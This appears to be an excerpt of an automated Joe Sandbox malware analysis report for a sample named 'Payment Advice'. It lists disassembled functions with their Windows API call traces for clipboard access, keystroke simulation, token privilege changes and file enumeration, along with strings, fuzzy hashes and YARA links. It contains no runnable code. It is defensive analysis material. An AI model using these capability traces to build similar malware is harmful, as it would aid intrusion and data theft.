Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4c3fa12ef7c61b496dc73481408023f486ff80c3bbfbabca1c87202176282fdd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D631D874A00205DBDB18DF58C482969FBB6FF49340B648AA9E409DB356DB31EDC1CBD0

Function 017522A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017522B1

Memory Dump Source

Source File: 00000000.00000002.1639436591.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1750000_Payment Advice.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 45f3d2ead6aab4384bc4127b53dbf11a827bff2c9db81db2c76d01141fa91172
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: BDE0E67594410EEFDB00EFB4D54969E7FB4EF04301F100161FD05E2281D6709D508A72

Non-executed Functions

Function 005EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 005EF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005EF8DC
GetWindowLongW.USER32(?,000000F0), ref: 005EF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005EF940
SendMessageW.USER32 ref: 005EF966
_wcsncpy.LIBCMT ref: 005EF9D2
GetKeyState.USER32(00000011), ref: 005EF9F3
GetKeyState.USER32(00000009), ref: 005EFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005EFA16
GetKeyState.USER32(00000010), ref: 005EFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005EFA4F
SendMessageW.USER32 ref: 005EFA72
SendMessageW.USER32(?,00001030,?,005EE059), ref: 005EFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 005EFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005EFB96
SetCapture.USER32(?), ref: 005EFB9F
ClientToScreen.USER32(?,?), ref: 005EFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005EFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 005EFC29
ReleaseCapture.USER32 ref: 005EFC34
GetCursorPos.USER32(?), ref: 005EFC69
ScreenToClient.USER32(?,?), ref: 005EFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 005EFCD8
SendMessageW.USER32 ref: 005EFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 005EFD41
SendMessageW.USER32 ref: 005EFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005EFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 005EFD8F
GetCursorPos.USER32(?), ref: 005EFDB0
ScreenToClient.USER32(?,?), ref: 005EFDBD
GetParent.USER32(?), ref: 005EFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 005EFE3F
SendMessageW.USER32 ref: 005EFE6F
ClientToScreen.USER32(?,?), ref: 005EFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005EFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 005EFF19
SendMessageW.USER32 ref: 005EFF3C
ClientToScreen.USER32(?,?), ref: 005EFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005EFFB6
GetWindowLongW.USER32(?,000000F0), ref: 005F004B

Strings

F, xrefs: 005EFF42
@GUI_DRAGID, xrefs: 005EFBCC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 4186bb019217a6c0c8891b82e9ab4346275c9c89b51d8fd8d2c517329482244b
Instruction ID: 82263899a88a8f0d84806201f4e11e35b2747485d7820c59985dd0853e8fffd4
Opcode Fuzzy Hash: 4186bb019217a6c0c8891b82e9ab4346275c9c89b51d8fd8d2c517329482244b
Instruction Fuzzy Hash: 3832FD75608285EFDB28CF64C884BAABFA9FF49344F045A29F695D72A1CB31DC40CB51

Function 005EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 005EB1CD

Strings

%d/%02d/%02d, xrefs: 005EAEFC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 15e9fe5913702093ec964ebf7dfa93ac6c7bb7c73cb374a2b77216434b9312c6
Instruction ID: d307bba9860cab86a7e05f06183cc45fc333d6d68f5530d974c5d57486e534fb
Opcode Fuzzy Hash: 15e9fe5913702093ec964ebf7dfa93ac6c7bb7c73cb374a2b77216434b9312c6
Instruction Fuzzy Hash: 3B12EEB1500289ABEB298F76CC49FAB7FB9FF85321F104219F959DA2D0DB709941CB11

Function 0059EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0059EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005F3AEA
IsIconic.USER32(000000FF), ref: 005F3AF3
ShowWindow.USER32(000000FF,00000009), ref: 005F3B00
SetForegroundWindow.USER32(000000FF), ref: 005F3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005F3B20
GetCurrentThreadId.KERNEL32 ref: 005F3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 005F3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005F3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005F3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 005F3B54
SetForegroundWindow.USER32(000000FF), ref: 005F3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 005F3B6C
keybd_event.USER32(00000012,00000000), ref: 005F3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 005F3B81
keybd_event.USER32(00000012,00000000), ref: 005F3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 005F3B8F
keybd_event.USER32(00000012,00000000), ref: 005F3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 005F3B9E
keybd_event.USER32(00000012,00000000), ref: 005F3BA3
SetForegroundWindow.USER32(000000FF), ref: 005F3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 005F3BCD

Strings

Shell_TrayWnd, xrefs: 005F3AE5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9b9f43457453cf8f6dae25d9c5cdfd9f5f9b3c58e4b8fecac043d8fab906feee
Instruction ID: 6b7ed588e7cd9294b2c3230791c085bd44f76cef1b64b1748fa229132642fa0e
Opcode Fuzzy Hash: 9b9f43457453cf8f6dae25d9c5cdfd9f5f9b3c58e4b8fecac043d8fab906feee
Instruction Fuzzy Hash: DF31C271A8031CBFFB216BA58C4AF7F3E6DEB44B50F105115FB04EA1D0DAB59D00AAA0

Function 005BACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 005BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005BB180
Part of subcall function 005BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005BB1AD
Part of subcall function 005BB134: GetLastError.KERNEL32 ref: 005BB1BA

_memset.LIBCMT ref: 005BAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005BAD5A
CloseHandle.KERNEL32(?), ref: 005BAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005BAD82
GetProcessWindowStation.USER32 ref: 005BAD9B
SetProcessWindowStation.USER32(00000000), ref: 005BADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005BADBF

Part of subcall function 005BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005BACC0), ref: 005BAB99
Part of subcall function 005BAB84: CloseHandle.KERNEL32(?,?,005BACC0), ref: 005BABAB

Strings

H*c, xrefs: 005BAE40
default, xrefs: 005BADBA
, xrefs: 005BAD17
winsta0, xrefs: 005BAD7D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*c$default$winsta0
API String ID: 2063423040-1941778646
Opcode ID: d2b39ad56b17873596651d94588ec226220fceeeda7551c5854e1d5600aeb18b
Instruction ID: 8eb1e9b2d646d26e760f2ff24bc972fbd059936a9a5885c62a3dc71e9242cfa1
Opcode Fuzzy Hash: d2b39ad56b17873596651d94588ec226220fceeeda7551c5854e1d5600aeb18b
Instruction Fuzzy Hash: 31817CB1800209AFEF119FA4DC49AEEBFBDFF08304F044219F915A6161DB72AE55DB61

Function 005C60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 005C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C5FA6,?), ref: 005C6ED8

Part of subcall function 005C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C5FA6,?), ref: 005C6EF1

Part of subcall function 005C725E: __wsplitpath.LIBCMT ref: 005C727B
Part of subcall function 005C725E: __wsplitpath.LIBCMT ref: 005C728E

Part of subcall function 005C72CB: GetFileAttributesW.KERNEL32(?,005C6019), ref: 005C72CC

_wcscat.LIBCMT ref: 005C6149
_wcscat.LIBCMT ref: 005C6167
__wsplitpath.LIBCMT ref: 005C618E
FindFirstFileW.KERNEL32(?,?), ref: 005C61A4
_wcscpy.LIBCMT ref: 005C6209
_wcscat.LIBCMT ref: 005C621C
_wcscat.LIBCMT ref: 005C622F
lstrcmpiW.KERNEL32(?,?), ref: 005C625D
DeleteFileW.KERNEL32(?), ref: 005C626E
MoveFileW.KERNEL32(?,?), ref: 005C6289
MoveFileW.KERNEL32(?,?), ref: 005C6298
CopyFileW.KERNEL32(?,?,00000000), ref: 005C62AD
DeleteFileW.KERNEL32(?), ref: 005C62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 005C62E1
FindClose.KERNEL32(00000000), ref: 005C62FD
FindClose.KERNEL32(00000000), ref: 005C630B

Strings

\*.*, xrefs: 005C6138, 005C6147, 005C6165

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 44d9574992ad1e9a9a94cfaa9c0430072459677578488fb3555174be319e6ee0
Instruction ID: 4d2ea8c1b1cf2ea0219086aa458960d5b30143db4457fcb4721d85ea5ada48ec
Opcode Fuzzy Hash: 44d9574992ad1e9a9a94cfaa9c0430072459677578488fb3555174be319e6ee0
Instruction Fuzzy Hash: 40511D7684811D6ECB21EBD1CC48EEFBBBCBF45300F0905EAE545A2141DA369749CFA4

Function 005D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0061DC00), ref: 005D6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 005D6B44
GetClipboardData.USER32(0000000D), ref: 005D6B4C
CloseClipboard.USER32 ref: 005D6B58
GlobalLock.KERNEL32(00000000), ref: 005D6B74
CloseClipboard.USER32 ref: 005D6B7E
GlobalUnlock.KERNEL32(00000000,00000000), ref: 005D6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 005D6BA0
GetClipboardData.USER32(00000001), ref: 005D6BA8
GlobalLock.KERNEL32(00000000), ref: 005D6BB5
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 005D6BE9
CloseClipboard.USER32 ref: 005D6CF6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: df8de1d0cce6c7e4f7b654b8479ec3c687cf0816dbe7df59cf84f1dada62b523
Instruction ID: f11d2449b2d34d84cecb2b56074e7b66c2793cea0617e6c700f2323a618b92e0
Opcode Fuzzy Hash: df8de1d0cce6c7e4f7b654b8479ec3c687cf0816dbe7df59cf84f1dada62b523
Instruction Fuzzy Hash: B05163712402026BD310BFA4DD5AF6F7BA9BF84B11F00152BF556D62E1DF70D9068B62

Function 005CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005CF62B
FindClose.KERNEL32(00000000), ref: 005CF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 005CF6E2
__swprintf.LIBCMT ref: 005CF72E
__swprintf.LIBCMT ref: 005CF767
__swprintf.LIBCMT ref: 005CF7BB

Part of subcall function 005A172B: __woutput_l.LIBCMT ref: 005A1784

__swprintf.LIBCMT ref: 005CF809
__swprintf.LIBCMT ref: 005CF858
__swprintf.LIBCMT ref: 005CF8A7
__swprintf.LIBCMT ref: 005CF8F6

Strings

%02d, xrefs: 005CF7B0, 005CF7B9, 005CF807, 005CF856, 005CF8A5, 005CF8F4
%4d, xrefs: 005CF761
%4d%02d%02d%02d%02d%02d, xrefs: 005CF728

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 0d8dac4b0cf4195a3a528e7bd45a5e7f0a93cc7978b2bd749b0aaf4adabc2853
Instruction ID: 51748020caeacf5f0f31898ce8eb3f5700b58e701fdc9835042eb68f9b4739af
Opcode Fuzzy Hash: 0d8dac4b0cf4195a3a528e7bd45a5e7f0a93cc7978b2bd749b0aaf4adabc2853
Instruction Fuzzy Hash: C1A11EB2408345ABC711FBA4C889DAFBBECFF98704F44092EF58596151EB34D949CB62

Function 005D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 005D1B50
_wcscmp.LIBCMT ref: 005D1B65
_wcscmp.LIBCMT ref: 005D1B7C
GetFileAttributesW.KERNEL32(?), ref: 005D1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 005D1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 005D1BC0
FindClose.KERNEL32(00000000), ref: 005D1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 005D1BE7
_wcscmp.LIBCMT ref: 005D1C0E
_wcscmp.LIBCMT ref: 005D1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 005D1C37
SetCurrentDirectoryW.KERNEL32(006339FC), ref: 005D1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 005D1C5F
FindClose.KERNEL32(00000000), ref: 005D1C6C
FindClose.KERNEL32(00000000), ref: 005D1C7C

Strings

*.*, xrefs: 005D1BE2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 48aad46c42b0923bc5c645ae193fc4cec5e0fce0eab9a8e8efb25efa4f7d88ef
Instruction ID: ea9bc764a87725ca77d7487c2970cf10f3a9a08bc6f2c6b41d3548d7200842b3
Opcode Fuzzy Hash: 48aad46c42b0923bc5c645ae193fc4cec5e0fce0eab9a8e8efb25efa4f7d88ef
Instruction Fuzzy Hash: 86319631640A19BBDF20ABF4DC49ADE7BADAF45320F144197F911D22E0EB70DE458A68

Function 005D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 005D1CAB
_wcscmp.LIBCMT ref: 005D1CC0
_wcscmp.LIBCMT ref: 005D1CD7

Part of subcall function 005C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005C6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 005D1D06
FindClose.KERNEL32(00000000), ref: 005D1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 005D1D2D
_wcscmp.LIBCMT ref: 005D1D54
_wcscmp.LIBCMT ref: 005D1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 005D1D7D
SetCurrentDirectoryW.KERNEL32(006339FC), ref: 005D1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 005D1DA5
FindClose.KERNEL32(00000000), ref: 005D1DB2
FindClose.KERNEL32(00000000), ref: 005D1DC2

Strings

*.*, xrefs: 005D1D28

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: acfaf7c5ffc06b664fada56e94db0d9a6d814be31d9c006cdc220b25136390da
Instruction ID: 4e3c1f7c2b7370f06926a755bfb962131577bdb790acfc78e8e7d26f9b0d5c37
Opcode Fuzzy Hash: acfaf7c5ffc06b664fada56e94db0d9a6d814be31d9c006cdc220b25136390da
Instruction Fuzzy Hash: EB31D631540A1ABACF20BBA8DC09ADE7BAEAF45324F140553F801A22D1DB70DE458B68

Function 00587D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00587DBD

Strings

], xrefs: 00587D9F
[:>:]], xrefs: 00587D37
\, xrefs: 005FF95B
\b(?<=\w), xrefs: 005FF877
Q\E, xrefs: 005886D6
[:<:]], xrefs: 00587D1D
\, xrefs: 00587E1D
[, xrefs: 00587E14
^, xrefs: 00587D96
\, xrefs: 00587D89
\b(?=\w), xrefs: 005FF85E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: b95bacecf3372a64da45673a2684f7ac9e90674de6fd053270dd989fa6fd860b
Instruction ID: 9bca9ecdfe53daca449543afab4a14f3dc06babae5a56806fce6aa6fce9b60e6
Opcode Fuzzy Hash: b95bacecf3372a64da45673a2684f7ac9e90674de6fd053270dd989fa6fd860b
Instruction Fuzzy Hash: 8482AE71D04219DBCB24DFA8C8816BDBFB2FF48310F2485A9D959BB291E7749D81CB90

Function 005D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005D09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 005D09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005D09FB
__wsplitpath.LIBCMT ref: 005D0A59
_wcscat.LIBCMT ref: 005D0A71
_wcscat.LIBCMT ref: 005D0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005D0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 005D0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 005D0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 005D0AFF
_wcscpy.LIBCMT ref: 005D0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005D0B4A

Strings

*.*, xrefs: 005D0B05

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: fe8736883dbdd9764117a9f53f0336b552aae92b2fdaabfbfcebee29d33c277d
Instruction ID: f27053b68ca59c3ebe0c8084e3eb64a9b04522c134c7d8c05ec78b4a3bc72aca
Opcode Fuzzy Hash: fe8736883dbdd9764117a9f53f0336b552aae92b2fdaabfbfcebee29d33c277d
Instruction Fuzzy Hash: E9616B725043069FD710EF64C845AAEBBE8FF89314F04491EF989D7291DB31E945CB92

Function 005BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005BABD7
Part of subcall function 005BABBB: GetLastError.KERNEL32(?,005BA69F,?,?,?), ref: 005BABE1
Part of subcall function 005BABBB: GetProcessHeap.KERNEL32(00000008,?,?,005BA69F,?,?,?), ref: 005BABF0
Part of subcall function 005BABBB: HeapAlloc.KERNEL32(00000000,?,005BA69F,?,?,?), ref: 005BABF7
Part of subcall function 005BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005BAC0E

Part of subcall function 005BAC56: GetProcessHeap.KERNEL32(00000008,005BA6B5,00000000,00000000,?,005BA6B5,?), ref: 005BAC62
